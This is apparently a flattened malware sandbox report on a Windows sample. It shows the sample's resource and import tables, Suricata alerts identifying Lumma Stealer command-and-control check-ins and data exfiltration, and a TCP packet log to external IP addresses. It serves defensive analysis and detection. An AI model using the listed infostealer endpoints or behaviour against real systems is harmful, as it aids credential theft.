                                                                                                                                                                                                RT_GROUP_CURSOR0x14ac800x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                                                RT_GROUP_CURSOR0x14af200x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                                                RT_GROUP_CURSOR0x179d180x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                RT_GROUP_CURSOR0x179f300x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                RT_GROUP_CURSOR0x17a1480x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                RT_GROUP_CURSOR0x17a3600x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0
                                                                                                                                                                                                RT_GROUP_CURSOR0x17a5780x22Lotus unknown worksheet or configuration, revision 0x2EnglishUnited States1.0294117647058822
                                                                                                                                                                                                RT_GROUP_ICON0x1546e00x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                                RT_GROUP_ICON0x15c4000x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                                RT_GROUP_ICON0x1641200x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                                RT_GROUP_ICON0x173b600x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                                RT_GROUP_ICON0x16be400x3edataEnglishUnited States0.8870967741935484
                                                                                                                                                                                                RT_VERSION0x1487180x35cdataEnglishUnited States0.45232558139534884
                                                                                                                                                                                                RT_ANICURSOR0x148c600x1ee6RIFF (little-endian) data, animated cursor "Small Hourglass" PPEscherEnglishUnited States0.08103666245259165
                                                                                                                                                                                                RT_MANIFEST0x148a780x1e7XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.5503080082135524
                                                                                                                                                                                                None0x14c9b80x47dataEnglishUnited States0.9436619718309859

                                                                                                                                                                                                Imports

                                                                                                                                                                                                DLLImport
                                                                                                                                                                                                KERNEL32.dllHeapSize, UnhandledExceptionFilter, FreeEnvironmentStringsA, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetEnvironmentStrings, GetCommandLineW, GetCommandLineA, SetHandleCount, GetStdHandle, GetStartupInfoA, GetModuleFileNameA, GetEnvironmentVariableA, GetVersionExA, HeapDestroy, HeapCreate, VirtualFree, CompareStringA, CompareStringW, VirtualAlloc, IsBadWritePtr, LCMapStringA, LCMapStringW, SetUnhandledExceptionFilter, GetFileType, IsBadReadPtr, IsBadCodePtr, GetCPInfo, IsValidLocale, IsValidCodePage, GetLocaleInfoA, EnumSystemLocalesA, GetUserDefaultLCID, GetStringTypeA, GetStringTypeW, GetACP, GetOEMCP, SetEnvironmentVariableA, GetDriveTypeA, GetLocaleInfoW, SetStdHandle, GetLocalTime, FindResourceA, GlobalAddAtomA, GetProfileStringA, InterlockedExchange, GetSystemTime, GetTimeZoneInformation, ExitThread, CreateThread, HeapReAlloc, GetDriveTypeW, RaiseException, HeapFree, HeapAlloc, RtlUnwind, GetStartupInfoW, SetErrorMode, SystemTimeToFileTime, LocalFileTimeToFileTime, GetFileSize, FindResourceExW, GetCurrentDirectoryW, GlobalFlags, FindNextFileW, lstrcmpiW, GetThreadLocale, GetStringTypeExW, GetVolumeInformationW, FindFirstFileW, FindClose, UnlockFile, LockFile, SetFilePointer, DuplicateHandle, FileTimeToLocalFileTime, FileTimeToSystemTime, GetProfileIntW, TlsGetValue, LocalReAlloc, TlsSetValue, GlobalReAlloc, TlsFree, GlobalHandle, TlsAlloc, LocalAlloc, GetProcessVersion, GetDiskFreeSpaceW, GetFileTime, SetFileTime, GetFullPathNameW, GetTempFileNameW, GetFileAttributesW, GlobalFree, lstrcmpW, lstrcmpA, lstrcmpiA, GetCurrentThread, GlobalGetAtomNameW, CreateEventW, SuspendThread, SetEvent, LoadLibraryA, GetVersion, lstrcatW, GlobalAddAtomW, GlobalFindAtomW, GlobalDeleteAtom, InterlockedDecrement, InterlockedIncrement, MulDiv, GetModuleHandleA, SetLastError, lstrlenA, ExitProcess, GlobalAlloc, GlobalLock, GlobalUnlock, SizeofResource, LoadResource, LockResource, SetCurrentDirectoryW, WritePrivateProfileStringW, GetPrivateProfileIntW, GetPrivateProfileStringW, FlushFileBuffers, WriteFile, ReadFile, SetFilePointerEx, SetEndOfFile, GetFileSizeEx, CreateFileW, MultiByteToWideChar, GetWindowsDirectoryW, GetModuleFileNameW, LoadLibraryW, WideCharToMultiByte, FreeLibrary, GetCurrentProcess, GetTempPathW, CreateDirectoryW, GetFileAttributesExW, GetLongPathNameW, GetShortPathNameW, GetLastError, LocalFree, MoveFileW, DeleteFileW, SetThreadPriority, Sleep, AttachConsole, GenerateConsoleCtrlEvent, FreeConsole, TerminateProcess, CreateProcessW, GetExitCodeProcess, CloseHandle, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, DeleteCriticalSection, GetCurrentThreadId, GetModuleHandleW, GetProcAddress, GetVersionExW, lstrcpynW, lstrcpyW, WaitForSingleObject, ResumeThread, FindResourceW, GetTickCount, lstrlenW, GetCurrentDirectoryA
                                                                                                                                                                                                USER32.dllMoveWindow, SetWindowTextW, IsDialogMessageW, IsDlgButtonChecked, SetDlgItemTextW, SendDlgItemMessageW, SendDlgItemMessageA, MapWindowPoints, PeekMessageW, AdjustWindowRectEx, EqualRect, DeferWindowPos, GetTopWindow, MessageBoxW, WinHelpW, GetClassInfoW, RegisterClassW, TrackPopupMenu, SetWindowPlacement, GetDlgItem, GetWindowTextLengthW, GetWindowTextW, DestroyWindow, CreateWindowExW, DefWindowProcW, GetMessageTime, GetLastActivePopup, GetForegroundWindow, SystemParametersInfoW, GetWindowPlacement, wsprintfW, EndPaint, BeginPaint, GetWindowDC, SetWindowPos, LockWindowUpdate, CheckMenuItem, IsChild, GetMenu, SetMenu, IsIconic, ExitWindowsEx, DestroyIcon, GetMessageW, TranslateMessage, DispatchMessageW, InsertMenuW, FindWindowW, GetMenuStringW, CallNextHookEx, keybd_event, SetWindowsHookExW, TrackPopupMenuEx, UnhookWindowsHookEx, GetMenuItemCount, WindowFromPoint, DestroyMenu, ShowWindow, GetCapture, IntersectRect, IsRectEmpty, SetRectEmpty, ReleaseDC, DrawFocusRect, GetSysColor, SetCursor, IsWindowEnabled, SetFocus, RegisterWindowMessageW, GetWindow, CreatePopupMenu, GetMessagePos, RedrawWindow, BeginDeferWindowPos, LoadCursorW, DestroyCursor, UnregisterClassW, GetWindowTextLengthA, GetDlgCtrlID, HideCaret, ShowCaret, ExcludeUpdateRgn, OffsetRect, EndDeferWindowPos, GetSystemMenu, RemovePropW, GetPropW, CallWindowProcW, SetWindowLongW, SetPropW, GetMenuItemID, GetMenuDefaultItem, LoadIconW, KillTimer, SetTimer, SetParent, AppendMenuW, InflateRect, ClientToScreen, GetCursorPos, GetKeyState, GetNextDlgTabItem, GetClassNameW, CharUpperW, GetDCEx, GetSysColorBrush, wvsprintfW, LoadStringW, EndDialog, CreateDialogIndirectParamW, DeleteMenu, GetParent, GrayStringW, DrawTextW, TabbedTextOutW, ScreenToClient, GetFocus, InvalidateRect, PtInRect, SetCapture, ReleaseCapture, UpdateWindow, CheckMenuRadioItem, IsWindowVisible, SetActiveWindow, SetForegroundWindow, PostMessageW, LoadMenuW, GetDC, GetWindowRect, LoadBitmapW, GetSubMenu, SetMenuDefaultItem, SendMessageW, EnableWindow, GetClientRect, GetWindowTextA, DrawTextA, GetClassInfoA, DefDlgProcA, DefWindowProcA, MapDialogRect, GetAsyncKeyState, ShowOwnedPopups, PostQuitMessage, BringWindowToTop, UnpackDDElParam, ReuseDDElParam, GetDesktopWindow, TranslateAcceleratorW, LoadAcceleratorsW, GetActiveWindow, ValidateRect, GetMenuCheckMarkDimensions, GetMenuState, ModifyMenuW, SetMenuItemBitmaps, SetRect, EnableMenuItem, CharNextA, CallWindowProcA, RemovePropA, SetWindowsHookExA, GetWindowLongA, SendMessageA, IsWindowUnicode, GetClassNameA, SetWindowLongA, SetPropA, GetPropA, IsWindow, GetWindowLongW, CopyRect, GetSystemMetrics
                                                                                                                                                                                                GDI32.dllOffsetViewportOrgEx, SetViewportExtEx, ScaleViewportExtEx, SetWindowOrgEx, SetWindowExtEx, ScaleWindowExtEx, SelectClipRgn, IntersectClipRect, SetViewportOrgEx, GetDeviceCaps, CreatePen, CreateSolidBrush, CreatePatternBrush, SetRectRgn, GetTextMetricsW, EnumFontFamiliesExW, SetMapMode, CreateRectRgn, CombineRgn, SetTextColor, SetBkMode, SetBkColor, SaveDC, GetClipBox, CreateRectRgnIndirect, ExtSelectClipRgn, SetStretchBltMode, StretchDIBits, SetDIBitsToDevice, RestoreDC, CreateDIBSection, DeleteDC, PatBlt, DeleteObject, SelectObject, GetBkMode, GetBkColor, GetTextExtentPoint32W, GetTextColor, Escape, ExtTextOutW, TextOutW, RectVisible, PtVisible, BitBlt, CreateCompatibleBitmap, CreateCompatibleDC, CreateBitmap, GetStockObject, GetObjectW, CreateDIBitmap, ExtTextOutA, GetTextExtentPointA, CreateFontIndirectW
                                                                                                                                                                                                comdlg32.dllGetSaveFileNameW, GetOpenFileNameW, GetFileTitleW
                                                                                                                                                                                                WINSPOOL.DRVClosePrinter, DocumentPropertiesW, OpenPrinterW
                                                                                                                                                                                                ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegQueryValueW, RegSetValueExW, RegCreateKeyW, RegSetValueW, RegDeleteKeyW, RegEnumKeyW, RegOpenKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegQueryValueExW, RegCreateKeyExW, RegDeleteValueW, SetFileSecurityW, GetFileSecurityW, RegEnumKeyExW
                                                                                                                                                                                                SHELL32.dllSHGetDesktopFolder, SHGetMalloc, SHGetFileInfoW, SHGetSpecialFolderLocation, SHGetPathFromIDListW, DragQueryFileW, SHFileOperationW, SHGetSpecialFolderPathW, DragAcceptFiles, ShellExecuteW, DragFinish, ExtractIconW
                                                                                                                                                                                                COMCTL32.dllImageList_BeginDrag, ImageList_GetImageInfo, ImageList_DragEnter, _TrackMouseEvent, ImageList_Draw, ImageList_AddMasked, ImageList_DragLeave, ImageList_DragMove, ImageList_EndDrag, ImageList_Destroy, ImageList_Create, PropertySheetW, DestroyPropertySheetPage, CreatePropertySheetPageW, ImageList_DrawIndirect, ImageList_ReplaceIcon
                                                                                                                                                                                                ole32.dllCoUninitialize, CoCreateGuid, CoInitialize, CoCreateInstance
                                                                                                                                                                                                OLEAUT32.dllSysAllocString, SysFreeString
                                                                                                                                                                                                SHLWAPI.dllPathFileExistsW, PathFindExtensionW, PathMakePrettyW, PathFindFileNameW, PathRemoveFileSpecW, PathRenameExtensionW, PathIsRootW, PathIsDirectoryW, PathIsURLW
                                                                                                                                                                                                WINHTTP.dllWinHttpQueryHeaders, WinHttpCrackUrl, WinHttpReadData, WinHttpCloseHandle, WinHttpOpen, WinHttpConnect, WinHttpOpenRequest, WinHttpAddRequestHeaders, WinHttpSendRequest, WinHttpQueryOption, WinHttpSetOption, WinHttpReceiveResponse

                                                                                                                                                                                                Possible Origin

                                                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                EnglishUnited States

                                                                                                                                                                                                Network Behavior

                                                                                                                                                                                                Suricata IDS Alerts

                                                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                2025-01-05T18:02:18.829266+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:19.580500+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449748188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:19.580500+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449748188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:20.163505+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449750188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:20.919112+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449750188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:20.919112+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449750188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:21.525493+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449751188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:22.710941+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449752188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:24.878108+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449753188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:26.330947+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449754188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:27.341178+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449755188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:27.818132+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449755188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:28.299990+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449756188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:28.770787+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449756188.114.96.3443TCP
                                                                                                                                                                                                2025-01-05T18:02:29.529144+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449757185.161.251.21443TCP
                                                                                                                                                                                                2025-01-05T18:02:30.287392+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449758104.21.37.128443TCP
                                                                                                                                                                                                2025-01-05T18:02:30.643871+01002008438ET MALWARE Possible Windows executable sent when remote host claims to send a Text File1104.21.37.128443192.168.2.449758TCP

                                                                                                                                                                                                Network Port Distribution

                                                                                                                                                                                                TCP Packets

                                                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                Jan 5, 2025 18:02:18.361114979 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:18.361159086 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:18.361222029 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:18.364470005 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:18.364483118 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:18.829189062 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:18.829266071 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:18.834341049 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:18.834357023 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:18.834614038 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:18.886486053 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:18.886509895 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:18.886590958 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:19.580522060 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:19.580610991 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:19.580660105 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:19.630917072 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:19.630942106 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:19.630954981 CET49748443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:19.630960941 CET44349748188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:19.691549063 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:19.691581011 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:19.691672087 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:19.692256927 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:19.692269087 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.162185907 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.163505077 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.163505077 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.163528919 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.163734913 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.165039062 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.165039062 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.165096998 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919112921 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919166088 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919193983 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919224977 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919253111 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919279099 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919281960 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919300079 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919326067 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919353008 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919380903 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919408083 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919414997 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919805050 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.919908047 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.923847914 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.923969030 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.923983097 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.924027920 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.924150944 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.924161911 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:20.924192905 CET49750443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:20.924196959 CET44349750188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:21.059772968 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:21.059811115 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:21.059902906 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:21.060189009 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:21.060204029 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:21.525423050 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:21.525492907 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:21.527081013 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:21.527091980 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:21.527333975 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:21.528424978 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:21.528548002 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:21.528582096 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:21.528645039 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:21.528651953 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.181298971 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.181392908 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.181442976 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.181607962 CET49751443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.181624889 CET44349751188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.252069950 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.252116919 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.252187014 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.252456903 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.252473116 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.710844040 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.710941076 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.712126970 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.712138891 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.712366104 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:22.713740110 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.713838100 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:22.713871956 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.221426964 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.221524000 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.221595049 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.221755028 CET49752443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.221780062 CET44349752188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.392889023 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.392920017 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.392980099 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.393228054 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.393238068 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.877993107 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.878108025 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.885267019 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.885293007 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.885536909 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.886681080 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.887029886 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.887049913 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:24.887129068 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:24.887136936 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:25.509438992 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:25.509522915 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:25.509583950 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:25.509881973 CET49753443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:25.509896040 CET44349753188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:25.818006992 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:25.818046093 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:25.818121910 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:25.818413973 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:25.818429947 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.330876112 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.330946922 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.332168102 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.332176924 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.332408905 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.333573103 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.333648920 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.333653927 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.801002979 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.801094055 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.801156044 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.801353931 CET49754443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.801367998 CET44349754188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.875210047 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.875247002 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:26.875334978 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.875946045 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:26.875957012 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:27.341092110 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:27.341177940 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:27.342422009 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:27.342428923 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:27.342633963 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:27.344491005 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:27.344579935 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:27.344584942 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:27.818142891 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:27.818229914 CET44349755188.114.96.3192.168.2.4
                                                                                                                                                                                                Jan 5, 2025 18:02:27.818336010 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:27.818579912 CET49755443192.168.2.4188.114.96.3
                                                                                                                                                                                                Jan 5, 2025 18:02:27.818591118 CET44349755188.114.96.3192.168.2.4
